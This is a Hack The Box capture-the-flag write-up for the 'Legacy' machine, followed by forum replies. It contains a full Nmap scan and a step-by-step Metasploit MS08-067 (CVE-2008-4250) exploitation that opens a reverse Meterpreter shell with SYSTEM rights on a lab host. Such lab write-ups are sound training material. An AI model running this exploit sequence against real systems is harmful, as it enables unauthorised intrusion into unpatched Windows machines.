Legacy write-up by Arrexel

##Enumeration##
Start off with our handy-dandy Nmap scan:

###Nmap###

nmap -T4 -A -v 10.10.10.4

Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 16:15 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating NSE at 16:15
Completed NSE at 16:15, 0.00s elapsed
Initiating Ping Scan at 16:15
Scanning 10.10.10.4 [4 ports]
Completed Ping Scan at 16:15, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:15
Completed Parallel DNS resolution of 1 host. at 16:15, 0.02s elapsed
Initiating SYN Stealth Scan at 16:15
Scanning 10.10.10.4 [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed SYN Stealth Scan at 16:15, 9.39s elapsed (1000 total ports)
Initiating Service scan at 16:15
Scanning 2 services on 10.10.10.4
Completed Service scan at 16:15, 6.46s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.4
Retrying OS detection (try #2) against 10.10.10.4
Initiating Traceroute at 16:15
Completed Traceroute at 16:15, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 16:15
Completed Parallel DNS resolution of 2 hosts. at 16:15, 0.02s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 16:15
Completed NSE at 16:20, 251.11s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Nmap scan report for 10.10.10.4
Host is up (0.12s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized|media device
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%), General Dynamics embedded (85%), Cisco embedded (85%), Motorola embedded (85%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003 cpe:/h:cisco:isb7150 cpe:/o:microsoft:windows_ce:5.0 cpe:/h:motorola:vip1200
Aggressive OS guesses: Microsoft Windows 2000 Server (91%), Microsoft Windows XP SP2 (91%), Microsoft Windows XP SP2 or Windows Small Business Server 2003 (91%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (91%), Microsoft Windows 2000 SP2 (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (89%), Microsoft Windows XP Professional SP3 (89%), Microsoft Windows XP SP2 or SP3 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -3h00m02s, deviation: 0s, median: -3h00m02s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:30:6d (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2017-09-17T20:15:47+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   123.57 ms 10.10.14.1
2   122.34 ms 10.10.10.4

NSE: Script Post-scanning.
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Initiating NSE at 16:20
Completed NSE at 16:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 275.83 seconds
           Raw packets sent: 2101 (97.178KB) | Rcvd: 64 (3.774KB)

There isn’t too much going on here. SMB/NetBIOS and Microsoft-DS. Looks like the system is running Windows XP so this should be a walk in the park.

##Exploitation##
A quick search gets us CVE-2008-4250, which has a Metasploit module. How convenient! Let’s try it.

exploit/windows/smb/ms08_067_netapi

Note target 7 is Windows XP SP3 English (for me) although this may differ based on Metasploit version. Do show targets to list all available.

msf exploit(usermap_script) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf exploit(ms08_067_netapi) > set target 7
target => 7
msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (171583 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1035) at 2017-09-17 16:24:57 -0400
[+] negotiating tlv encryption

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We’re in! Grab the flags from C:\Documents and Settings\john\Desktop\user.txt and C:\Documents and Settings\Administrator\Desktop\root.txt and call it a day.

Many members encountered problems using this exploit because -in older metasploit versions- the fingerprinting part doesn’t work. Therefore, they had to guess the correct target version for the exploit and this guessing would result in crashing the box, most of the time.

@alamot said:
Many members encountered problems using this exploit because -in older metasploit versions- the fingerprinting part doesn’t work. Therefore, they had to guess the correct target version for the exploit and this guessing would result in crashing the box, most of the time.

Thanks, modified it to account for proper target selection.

Nice quick write up :D.

good job

did anyone find a working exploit for this? I tried a lot, but none of them worked :frowning:

When i do nmap scanning I get all ports are filtered statement. I’ve been enumerating all the boxes in HTb but I’m getting the same problem. How do I proceed further.

Type your comment> @3zculprit said:

When i do nmap scanning I get all ports are filtered statement. I’ve been enumerating all the boxes in HTb but I’m getting the same problem. How do I proceed further.

In case anyone else has this problem, reset the box. I tried an exploit for the wrong service pack which immediately caused the ports to report as “filtered”. Connecting with smbclient also gave an error, so I figure it causes some kind of crash. Resetting fixes this.

Thanks @Arrexel for the nice walkthrough.Is there a technique to enumerate SMB without Metasploit module. Please advise,